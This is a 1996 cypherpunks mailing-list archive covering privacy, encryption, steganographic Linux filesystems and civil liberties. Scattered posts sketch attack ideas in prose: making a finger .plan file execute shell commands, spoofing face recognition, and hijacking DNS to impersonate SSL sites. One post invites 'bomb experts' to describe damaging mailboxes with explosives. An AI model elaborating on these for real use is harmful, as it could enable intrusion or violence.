MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I agree that this project needed to be done to educate the public, but I
must say I'm glad my name isn't attached to it. 

To answer legitimate concerns about abuse, perhaps version 2 could make the
relevant http logs publicly available? So in addition to checking the
governor's son's driving record, you could check which other IP addresses
have been looking at the governor's son's driving record. Spider detection
and retaliation would also be nice.

(Of course this would have the side effect of increasing the visibility of
the anonymizer/canadianizer/exonizer services, which would not be a bad
thing.)

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMgppM5NcNyVVy0jxAQFjFwIAyio1QMkAC7/sH3PdVbGXuTImey+1ewg2
Nxl7bZlZe/YvYlk2yomKW24bgZJ5Vjiecc7g35SM+jveLRWA0xgbkg==
=yDFP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTH <nozefngr@mail.apple.com>
Date: Fri, 9 Aug 1996 10:21:03 +0800
To: <cypherpunks@toad.com>
Subject: Basic Unix Hacking
Message-ID: <199608082320.QAA17952@scv2.apple.com>
MIME-Version: 1.0
Content-Type: text/plain



Is there a way to get a .plan file to execute shell script when
it is read by finger??

I'm sure this is an old question, but it seems there must
be a way.

echo \"date\"  or some damn thing that will execute as opposed
to printing.


The fingerD I am working with does not seem to call
a .fingerrc file.

-Chris



..    But there *are* a million monkeys on the net,
..    and I still aint seen no Shakespeare!             <me>
...
...    smtp: nozefngr@apple.com
..     page: 1.800.680.7351
..     http: http://virtual.net/Personal/nozefngr/
..     icbm: lat37*21'.lon121*5'
..
..  the kabuki project: http://remarque.berkeley.edu/kabuki/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu>
Date: Fri, 9 Aug 1996 09:09:31 +0800
To: cypherpunks@toad.com
Subject: Re: appropriate algorithm for application
In-Reply-To: <320A29E7.13728473@systemics.com>
Message-ID: <ML-2.2.839536845.7349.scott@homebox.>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Scott McGuire wrote
>>

... stuff deleted ...

>>
>> 
>> Why not just encrypt the files with regular, single key encryption and only
use
>> the public-key encryption on a master file holding a copy of all the
individual
>> keys?  This would be faster right?
>
>The main reason is so that anyone can generate new keys as and when
>they please. The master key is not required for key generation, which
>makes it more secure (ie. it spends more of its time in the safe) and
>practical (the master key may be in a different building).
>
>Gary
>--
>pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
>Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
>^S
>^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T

If the master file (or say master directory with one keyfile for each
encrypted file) is encrypted with public key encryption, than anyone with the
master public key can add a new encrypted file key but only the person with
the master private key can remove one of those keys.

Now that I think about it, this is like having each user encrypt their file
with a conventional key and sending a PGP encrypted message with the key they
used to the maintainer of the master file.  Of course if you don't trust the
users to give up a copy of the key, you would need to automate the procedure.

Scott

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBMgpQiN7xoXfnt4lpAQEBfwQAuHXSGhgWXr1S7gEKWH9iygLlSrioGjoz
/4+kqXKW/Q1ygDub0W3Tdr54uHaltAD8V/uk539i2ToTA0HQwaQ/jQq4eyRWrASl
bW1e5VWkJrKOm3J1qDSfIcoD7ACygwMb2Fxmp1w0GQ5uOOwjH8bow7YGMVPZKa/C
pDLIbjT36bM=
=18an
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 10:24:00 +0800
To: cypherpunks@toad.com
Subject: Re: AOL crashes and burns
Message-ID: <ae2fcae8050210047014@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:16 PM 8/8/96, Warrior wrote:
>Great news, eh?

No big deal, as I see it.

The only reason the AOL outage made the headlines is because of market
share. My own local ISP goes out at times, sometimes for more than a day.
And judging by the comments of others here (e.g, "my connection has been
flaky," "My ISP was down for the past few days," "Could someone mail me the
last 3 days worth of traffic?"), I suspect this is common.

Market share is what generates headlines.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 9 Aug 1996 09:15:03 +0800
To: stewarts@ix.netcom.com
Subject: Re: Anonymous Remailers at work
Message-ID: <01I81GCO6IQ49JD3GI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I've been trying to encourage the scientific ethics people to have an
email address for tips + information about using anonymous remailers. As can be
seen by the first part (lack of an email address), I haven't gotten very far as
yet...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Fri, 9 Aug 1996 10:43:24 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Oregon License Plate Site in the News Tonight!
Message-ID: <2.2.32.19960808234932.00902f58@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


My main concern regarding access to this information rests in the fact that
this database has always been available to anyone who understood how to get
it and use it. Recently I received a letter from some credit card company
offering to provide me with my credit report, social security history, and
insurance related records  on a regular basis (for a fee of course). How
about my police, fbi, school, and dating records while we're at it. How much
is already available only to those that know the ropes.

Well today AP ran another story about the reaction surrounding Aaron's
actions. Nice picture of the back of Aaron's head. They didn't print is
lisense plate number either.

ObCypherpunks: How many people do you know that are working on a day to day
basis with medical records systems, the District Attorney's computers, your
doctor's computers, state Department of Health, and so on. I'm sure it's
come up before but isn't this an obvious of application of encryption and
PAK (Public Access to Keys)? Any legislation currently to _require_ that
medical records and such be encrypted with access restricted. 

Something like: Alice (my primary care giver) and I each have the key to the
records that Alice stores. Bob (my dentist) has a legitimate need to these
records so I issue Alice and Bob a new key. With that key, the software
allows Alice to make a replicate (synchonizable at that) of the record and
transfer it to Bob who uses his key to access the data. It may even be that
_any_ time, any of the replicas are to be accessed _my_ private key must be
employed although one may argue that in times of tragedy it would be prudent
to get my medical history immediately. I would say there is little in those
records that would help an emergency room doctor make life saving desisions.
That anything that the ER should know about me to save my life should be on
a Medical Emergency Bracelet. I guess it would not matter if you encrypted
with a key short enough to mumble from the back of an ambulance.

The market for encryption enabled applications is just about to take off. 

--j

At 03:25 PM 8/8/96 -0700, Rich Graves wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I agree that this project needed to be done to educate the public, but I
>must say I'm glad my name isn't attached to it. 
>
>To answer legitimate concerns about abuse, perhaps version 2 could make the
>relevant http logs publicly available? So in addition to checking the
>governor's son's driving record, you could check which other IP addresses
>have been looking at the governor's son's driving record. Spider detection
>and retaliation would also be nice.
>
>(Of course this would have the side effect of increasing the visibility of
>the anonymizer/canadianizer/exonizer services, which would not be a bad
>thing.)
>
>- -rich
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQBVAwUBMgppM5NcNyVVy0jxAQFjFwIAyio1QMkAC7/sH3PdVbGXuTImey+1ewg2
>Nxl7bZlZe/YvYlk2yomKW24bgZJ5Vjiecc7g35SM+jveLRWA0xgbkg==
>=yDFP
>-----END PGP SIGNATURE-----
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 9 Aug 1996 10:31:42 +0800
To: stewarts@ix.netcom.com
Subject: Re: Stealth cookies
Message-ID: <01I81GMK7QGY9JD3GI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart"  7-AUG-1996 06:58:56.42

>However, there's a way to cheat the cookie spec; I don't know
>if this was intentional, but it was realized quickly by the market :-)
>The issue is that your browser sends along an HTTP_REFERRER variable,
>which points to the last page you visited before the current page.
>It's useful for sites to find out where their pages are being referenced,
>and they may (legitimately) want to only give out information if you're
>coming from one of their previous pages.

	Does www.anonymizer.com filter out cookies and their requests? I'd also
be curious if an alternate means of specifying the url (without having to
manually type it in) is possible such that people would have problems doing a
search for all pages connecting to a page. I.e., currently, I can search for
pages connecting to a particular page through the anonymizer via doing an
AltaVista search for link:/page/in/which/i'm/interested.html. If the person had
to realize that, say, they had to do a search for
page__in__which__i'm__interested.html, that could make unfriendly tracing of
backlinks - sensitive backlinks if you're using the anonymizer - more difficult.
	-Allen

P.S. The problem with blank pages from the anonymizer seems to be fixed, or at
least I haven't run into it recently - thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 9 Aug 1996 12:46:43 +0800
To: declan@eff.org
Subject: Re: Internal Passports
Message-ID: <01I81GQQLAL69JD3GI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan@eff.org"  "Declan McCullagh"  7-AUG-1996 10:15:54.28

>The Hatch simulated "child porn" bill was reported out of the Senate
>judiciary committee favorably, with the addition of language making it a
>felony to *attempt* to view child porn. This wording is aimed at the Net:
>  "Click Here to see Young Girls in Lust." 

	One wonders if someone could dig up pictures taken by some senators or
reps of their grandkids bathing in a pool... could be a nice publicity stunt.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 9 Aug 1996 11:18:09 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 1-Aug-1996
Message-ID: <01I81HBZJJWK9JD3GI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu"  1-AUG-1996 17:11:49.07
To:	IN%"edupage@elanor.oit.unc.edu"  "EDUCOM Edupage Mailing List"

>*****************************************************************
>Edupage, 1 August 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

[...]

>CELLULAR PHONE COMPANIES FIGHT CLONING
>To fight the illegal practice called "cloning," cellular telephone carriers
>will be adopting new "smart phone" technology intended to foil high-tech
>criminals by matching calls with encoded passwords.  In cloning, pirates
>use portable scanners and computers to intercept the cellular phone user's
>phone and serial numbers as they are being broadcast to a transmitting
>tower or "cell site."   The new digital phones will contain a non-clonable
>''smart cards'' that encrypt the identifying information to prevent
>scanners from eavesdropping or cloning the customer's telephone number. 
>(San Jose Mercury News 1 Aug 96)

	It sounds like the "smart cards" will have some chip oddities to try
to prevent reading them - something in TCMay's department. I do wonder whether
they're going to have one key for all of them, or differing keys for each user.
If the former, then cracking one (which I get the impression is quite possible)
equals cracking all, of course.

>G7 LEADERS & THE INTERNET
>Experts on electronic communications said ideas presented by G7 leaders for
>fighting terrorism  by restricting access to the Internet are "naive and
>probably unworkable" because there are too many ways to circumvent
>censorship on the Net to believe regulation could prevent terrorists from
>using the technology for communications.  (Toronto Globe & Mail 1 Aug 96
>A4)

	Yes... although it could be rather inconvenient.

>CANADIAN SERVICE PROVIDERS TACKLE OBJECTIONABLE MATERIAL
>Canadian access providers are developing guidelines for dealing with
>potentially objectionable material and have set up a code of conduct
>committee, with goals that include establishing guidelines members can use
>to determine if information stored on their servers is illegal.  (Toronto
>Globe & Mail 1 Aug 96 B1)

[...]

>CERTIFIED WEB SITES
>The National Computer Security Association in Carlisle, PA., will certify
>that a Web site meets minimum security specifications, including the
>presence of firewalls, use of passwords, and encryption of sensitive data
>transmission.  Certifications costs $8500 a year and requires that the site
>submit to remote tests, an NCSA site visit, and random compliance audits. 
>(Computerworld 29 Jul 96 p2)

	One hopes that the level of encryption will be required to be above
single DES, at least...

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.  

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill. 

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage 
>Gene Fullmer  (if your name is Gene Fullmer;  otherwise, substitute your
>own name).  ...  To cancel, send a message to: listproc@educom.unc.edu with
>the message: unsubscribe edupage.   (If you have subscription problems,
>send mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 9 Aug 1996 10:23:30 +0800
To: tcmay@got.net
Subject: Re: Blurring the Chains of Causation
Message-ID: <01I81HNSD4YG9JD3GI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  1-AUG-1996 18:22:25.80

>Many of the proposed restrictions seek to further blur this chain of
>causation, by making someone who provides access to materials which _may_
>later be used in a crime, or which may "inspire" someone to crime, a kind
>of criminal.

[...]

>People who actually commit real crimes are the criminals, not those who
>sold them Hostess Twinkies without first checking their blood sugar level.
>Not those who let a library patron look at a "dangerous" book. And not
>those who provided strong cryptographic tools which _might_ be used by
>terrorists, pedophiles, and money launderers.

	Quite. One analogy that should bring things a bit closer to home to
liberal types is that of zoning laws and restrictive covanents. The
(unfortunately legally accepted) justification, as I understand it, for many
zoning laws is that they prevent reductions in property values. Restrictive
covanents, such as against blacks or AIDS patients, have the same argument for
them, if one accepts the logic of the proposed restrictions. Blacks/whoever
moving in causes racists (or people anticipating the actions of racists) not to
want to move in or causes them to sell; this reduces local property values. By
the logic of the proposed restrictions, that means blacks/whoever should be held
responsible for the decrease in property values and barred or fined.
	Obviously, this whole idea is nonsense... only if you're the last
_person_ in a chain of causation are you the person making a decision for which
you should be blameable. (By person I refer to that people are the only beings
capable of making such a choice. I neither treat cows as having rights/choices
nor do I hold a bull criminally responsible for goring someone. Rights mean
responsibility; choices mean consequences.) Otherwise, someone else has the
chance to make their own decision and avert the negative results.... or not.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 9 Aug 1996 10:49:22 +0800
To: cypherpunks@toad.com
Subject: Re: Fixes to loop.c et al. for DES,IDEA,stego now done
In-Reply-To: <199608062350.QAA10693@abraham.cs.berkeley.edu>
Message-ID: <4ue0dk$2g4@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.LNX.3.91.890918054255.204A-100000@HellSpawn>,
Damien Lucifer  <root@hellspawn.Berkeley.EDU> wrote:
>
>
>On Tue, 6 Aug 1996, Ian Goldberg wrote:
>> This directory contains patches to the Linux kernel to enable encryption and
>> steganography of filesystems. Encryption allows you to have a scrambled
>> partition or file that, with the proper pass phrase, you can mount, just
>> like a normal filesystem. Steganography allows you to hide a filesystem in
>> the low bits of, say, an audio file. You can even combine these two to hide
>> a scrambled filesystem in the low bits of an audio file (see the example,
>> below).
>
>
<snip>
>So the question on my mind, is can the loop device(s) be 
>multi-threaded? I decided to be clever one evening and moved all my home 
>directories to cfs directories.. unfortunatly when two instances of the 
>same user try to hit their CFS home directory at once, the whole machine 
>goes flubflub and and needs to be rebooted. Single threading didnt seem 
>like such a terrible thing when I installed cfs, but lately its become 
>rather restrictive and ugly to deal with. Please tell me theres a better 
>way. :) 

Well, unlike CFS, loop.c is part of the Linux kernel, which is single-threaded,
so I guess loop.c is also single-threaded.  However, I took care that deadlocks
be avoided (mounting a loop device as another loop device (for example,
hiding an encrypted filesystem as stego) caused me to think a bit, but I'm
fairly confident that it works now).

   - Ian

[For those that missed it, the URL is

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/index.html

mirror site:

ftp://csclub.uwaterloo.ca/pub/linux-stego/index.html
]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgqEI0ZRiTErSPb1AQGI2gP+Pxq4auOpMSqVvCT9a/LRuj8fUhbmoG95
3hdYYRn/GWRZTK1IcdyUpVnIcHfS6SUz+0l39q/guMKfGGgPOOsWYMpL7rRcffZB
ZzZ8lWxO0JCOTPE8NIEuvdI3T+8bnVROeQ9u/YjRPnhMMQaOTUoCclt2fUt2+6YD
td9FWFl7Pvc=
=d1Am
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Fri, 9 Aug 1996 11:09:28 +0800
To: "John F. Fricker" <jfricker@vertexgroup.com>
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <2.2.32.19960808234932.00902f58@vertexgroup.com>
Message-ID: <Pine.GUL.3.95.960808172010.7089C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Aug 1996, John F. Fricker wrote:

> ObCypherpunks: How many people do you know that are working on a day to day
> basis with medical records systems, the District Attorney's computers, your
> doctor's computers, state Department of Health, and so on. I'm sure it's
> come up before but isn't this an obvious of application of encryption and
> PAK (Public Access to Keys)? Any legislation currently to _require_ that
> medical records and such be encrypted with access restricted. 

"Require"?

Wouldn't do shit. It's a social problem more than a technological problem.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 9 Aug 1996 13:17:34 +0800
To: cypherpunks@toad.com
Subject: Going Postal (Was: Boom!)
In-Reply-To: <2.2.32.19960808224330.00834cbc@panix.com>
Message-ID: <199608090050.RAA15679@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


DCF writes:

> So, if it turns out that TWA 800 was an accidental wing tank 
> explosion, will they give us our civil liberties back?  If not, 
> why not?

The Post Office has now jumped on the terrorist bandwagon by 
announcing that it will no longer be legal to drop any package
weighing over 16 ounces into a collection box. 

Larger packages will have to be presented in person at the 
Post Office, and I wouldn't be surprised if several forms of
ID were required.

Should wreak havoc with the mail order video tape rental business,
with those handy pre-paid 4th class labels you just slap on the 
tapes before dropping in the nearest mailbox. 

I suspect one could do a lot of damage to a mailbox with under 16
ounces of the proper explosive.  Perhaps one of our resident
Cypherpunks bomb experts could expand on this subject.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 9 Aug 1996 15:05:50 +0800
To: cypherpunks@toad.com
Subject: Re: Thank you.
In-Reply-To: <199608081616.SAA01670@basement.replay.com>
Message-ID: <4ue24a$2ov@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199608081616.SAA01670@basement.replay.com>,
Anonymous <nobody@REPLAY.COM> wrote:
>I forgot the name of the person who wrote the patches
>to the Linux kernel for stego.
>
>They work perfectly, and I had no problems setting it up.
>
>Many thanks.
>
No problem.  I urge you to push (on linux-kernel@vger.rutgers.edu and/or
comp.os.linux.development.system) for its inclusion in the standard kernel
before 2.1 comes out.  Stego isn't that useful a feature, if the very fact
of having a modified kernel that supports it, is incriminating...

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgqLhkZRiTErSPb1AQFtaQP/c63xDJDKJ6T3FmgmswdPDX/Sw2zTiGdS
WiZyFvZmj2o1TgAcJI+TisvBD6DPatJWD6xdCnmJD04fvCB1UsYsJsVuNJv1WSCi
epgJ0o/FO0jM8ESj/z60XcllCQtHR7n1kQti9PFjZB2jpOTRRsERD6owwEnsNtIf
up0R5wTmxdQ=
=yxMM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 11:54:32 +0800
To: cypherpunks@toad.com
Subject: Re: Boom!
Message-ID: <ae2fd9c406021004edd7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:43 PM 8/8/96, Duncan Frissell wrote:
>So, if it turns out that TWA 800 was an accidental wing tank explosion, will
>they give us our civil liberties back?  If not, why not?
>

You must be kidding. Civil rights (the real ones, not the affirmative
action/antidiscrimination bullshit kind) only get constricted.

The government only tightens the noose, it never loosens it.

On a related note, it looks like Richard Jewell, the "Olympic Bomber," may
not be charged and may even receive a page 37B "letter of clarification"
from the Feds. No word on what the pack of 100 media vultures camped in his
apartment's driveway will say.

I suspect he will never live a normal life. Even if never charged, the
splashing of private photos from his apartment--such as him cradling an
AR-15 while dressed in camo--will stick in people's minds. What recourse
does he have that camera crews were invited in on the searches? (*)

(* In my local large city, San Jose, the cops used to invite the tabloid
t.v. crews in on busts of suspected drug dealers. Kickbacks were probably
involved. Anyway, the Fox network used to send camera crews in with the
cops who kicked down doors, getting juicy coverage for "reality t.v." shows
like "Cops." People in their underwear, people crying, people naked (Fox
covered up the naughty bits digitally). After a privacy invasion lawsuit
filed by one of the raided parties--I don't recall if they were ever found
guilty or not, not that it matters--the cops stopped inviting the camera
crews along. Judging by what I still see on t.v., other cities haven't
stopped the practice. Surely a raid by cops, justified or not, does not
give me, or you, or KCBS t.v. to tag along and enter a private home with
our tape recorders and cameras rolling.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 9 Aug 1996 10:38:31 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: ****CyberWatch Security With Face Recognition 08/07/96
In-Reply-To: <Pine.SUN.3.91.960808083741.14499I-100000@crl5.crl.com>
Message-ID: <Pine.SUN.3.94.960808175801.852A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Aug 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Thu, 8 Aug 1996, Joseph M. Reagle Jr. wrote:
> 
> > TrueFace CyberWatch uses Miros' software and a small video
> > camera on top of the computer monitor to verify computer users
> > when they try to access protected data. TrueFace "snaps" a
> > picture of the current computer operator and compares it to
> > images in a database of authorized users. Continued spot checks
> > are taken to ensure the same user is at the computer...and
> > cannot be fooled by holding up a photo of a person. 
>  
> How about substituting a video tape of an authorized user for 
> the camera input?  (Hey, it worked on the old Mission Impossible
> show and a whole slew of movies.)

Or a very accurate movie style mask?

> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 9 Aug 1996 05:13:31 +0800
To: cypherpunks@toad.com
Subject: Thank you.
Message-ID: <199608081616.SAA01670@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I forgot the name of the person who wrote the patches
to the Linux kernel for stego.

They work perfectly, and I had no problems setting it up.

Many thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 9 Aug 1996 12:12:49 +0800
To: cypherpunks@toad.com
Subject: Why should we trust the system?
Message-ID: <199608090119.SAA20142@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


When supporting plans like GAK ("key escrow") and wiretaps, you will 
frequently see the Denning-types justify them by claiming that there's 
protection from a requirement that a judge issue a search warrant.  It 
should be instructive, then, to present the Richard Jewell case as an 
excellent counter-example.  Richard Jewell, as you should all be aware, is 
the poor soul who happened to first see that pipe bomb at the Atlanta 
Olympics.  However, hours after it was publicly revealed that the Atlanta 
911 center screwed up, wasting 10 minutes looking up the address of 
"Centennial park," officialdom suddenly discovered they needed news to 
divert attention from their buffoonery.  They found it, as if on cue.

Tonight, I saw a national network news show say how Jewell is apparently 
quite innocent, and that the news media was quite willingly "used" by the 
government to convict Jewell in the press.  Great mea culpa, but that still 
leaves some serious questions.  Presumably, the government got warrants to 
search Jewell's apartment, correct?  Okay, what evidence did they use to 
support the granting of those warrants?

What, EXACTLY, did they tell the judge that ostensibly convinced him to 
grant a warrant?  Remember, police aren't supposed to get a warrant simply 
if they can't prove that a person is NOT a bomber.  The standard is suppose 
to work the other way around:  The police should get a warrant only if the 
amount of evidence of guilt (or, evidence of evidence) is sufficiently 
detailed to rise to a certain level of authority, known as "probable cause."

Evidence doesn't evaporate.  More precisely, the police had a responsibility 
to collect enough evidence together, POSITIVELY, to be able to show probable 
cause to believe that a crime had occurred, and that Jewell was guilty.  
Some of that evidence might, hypothetically, have initially appeared to show 
guilt and was later clarified, but that early evidence must still exist, to 
at least show the public that the cops didn't entirely fabricate the 
justifications they used to get the warrants.   So I ask again, did the 
police/FBI EVER have enough evidence to convince anyone by that "probable 
cause" standard?  Well, if they say they had it in the case of Richard 
Jewell, that isn't very reassuring.  

Okay, I'll admit that I _never_ believed that judges actually follow the 
standards they claim to.  But many other people of those who are more 
establishmentarian than I (I guess that group includes just about everybody, 
huh?) at least pretend to believe this, or hope this, and maybe a few 
suckers actually do. It should be their responsibity, then, to show that the 
granting of a search warrant occurs only when justified.  In Jewell's case, 
that was not the case.

If we allow this fiasco to die without a full analysis, particularly in 
light of the government's repeated assurances with regards to search 
warrants, we will be as incompetent as the police were.



 
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 9 Aug 1996 10:19:43 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: An SSL implementation weakness?
In-Reply-To: <83952437618205@cs26.cs.auckland.ac.nz>
Message-ID: <199608082324.SAA05497@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


pgut001@cs.auckland.ac.nz wrote:
>  
> Lets say you steal www.megafoobarcorp.com.  People connect to this site (which 
> is actually your bogus site), Netscape (for example) displays the blue line 
> and non-broken key (which is actually for your J.Random certificate rather 
> than the real megafoobarcorp one) to show the connection is secure, and you've 
> just subverted their site.  
>  
> The problem is that unless the user on the client side checks their 
> certificates (which noone does), all they're told is "A secure link is 
> established", not who the secure link is established to.  Even if browsers did 
> pop up a dialog to tell them who the secured connection was to, after about 
> the third time people would click on the "Never show this incredibly annoying 
> dialog again" option and never look at it again.     
>  
> This effectively reduces an attack on an SSL-enabled server to an attack on 
> the DNS.  Is this as simple as it seems, and is it worth doing a writeup on?

I do not know much about how SSL works, but SSH (Secure Shell) has
a nice safety built in. It creates  a database of known hosts and
for each connection it matches the current host certificate (public
key) with the old public key from the ssh's database of known
hosts. If the keys mismatch, a warning is issued.

It actually works. Maybe the same logic should be used in SSL?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Aug 1996 12:23:00 +0800
To: cypherpunks@toad.com
Subject: "Thank you for not smoking" and other euphemisms
Message-ID: <ae2fe17707021004bcfc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



[Not to pick on Alan, but I clipped out 8 (eight) separate cc: copies
besides the main address! People, take a minute to trim the
ever-accumulating cc: list. If someone is subscribed to CP, they don't need
a separate copy. And so on.]

At 1:11 AM 8/9/96, Alan Horowitz wrote:
>Nrth Carolina Jury instructions also mention that petite jurors are
>"discouraged" from asking questions of the witness. I guess that means
>they are not forbidden to do so.

"Petite jurors" Is this a typo, or a special term of art in North Carolina?

But your "discouraged" point is well-taken, an all too common. Other
examples are:

"Thank you for not smoking" (Suggesting they'll thank me if I don't smoke,
but not actually forbid me from smoking. Of course, this euphemism means
"Smoking forbidden.")

"Donations suggested." This usually for leftist events, e.g., a speech by a
Nicaraguan freedom fighter. Of course, what they really mean is "admission
fee mandatory," but they call it a "suggested donation." I doubt one will
be arrested for barging through the door without paying the "suggested
donation," but this is a possibility, as they may deny admission.

(And then there's the "sliding scale donation suggested," say, from $5 to
$15. Presumably this is the embodiment of pure Marxist theory, "from each
according to his ability, to each according to his need." Be interesting to
see their reaction if one declined to make any donation.)

--Tim May





Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








